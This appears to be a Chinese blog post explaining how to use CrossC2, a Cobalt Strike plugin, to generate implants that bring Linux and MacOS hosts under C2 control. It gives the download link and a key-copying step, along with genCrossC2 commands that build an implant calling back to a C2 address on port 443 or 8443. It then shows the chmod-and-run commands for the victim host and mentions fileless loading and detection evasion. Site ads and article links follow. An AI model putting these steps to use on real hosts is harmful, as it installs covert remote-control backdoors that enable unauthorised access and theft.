0x01 前言
Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件。用法我的想法来说,相当于一个小集群,插件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等技术的研究。
简而言之:一个CS的简单小插件,目的就是上线Linux主机, 可做一些简单的操作,记录一下使用过程中遇到的一些问题,并且在使用中操作的正确性。
Cross c2支持架构说明:
0x02 CrossC2下载安装
下载地址 https://github.com/gloxec/CrossC2/releases
windows版本 linux 版本 mac版本
客户端生成的话记得复制 运行在服务器端程序根目录的 .cobaltstrike.beacon_keys 文件到客户端 生成上线木马
genCrossC2.Win.exe 192.168.100.111 443 null null Linux x64 C2
0x03 生成可执行文件并上线Linux
[usage]: ./genCrossC2.Linux [host] [port] [getURI] [postURI] [platform] [arch] [outputFileName] -platform 'MacOS' / 'Linux' -arch 'x86' / 'x64'
[ex]: ./genCrossC2.Linux 127.0.0.1 443 null null Linux x64 C2
CrossC2.cna 文件在source code里面 下载了安装到客户端脚本管理器
上传被控端 chmod 755 ./C2 && ./C2D:\temp\genCrossC2.Win>genCrossC2.Win.exe 127.0.0.1 8443 null null Linux x64
./C2
___ ___ ____
/ __\ __ ___ ___ ___ / __\___ \
/ / | '__/ _ \/ __/ __| / / __) |
/ /__| | | (_) \__ \__ \ / /___ / __/__
\____/_| \___/|___/___/ \____/|_______|
CrossC2 v2.2.1#stable @hook
{cs >= 4.1}
*[success] : Packed 1825240 byte.
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?
· 如何调用 DeepSeek 的自然语言处理 API 接口并集成到在线客服系统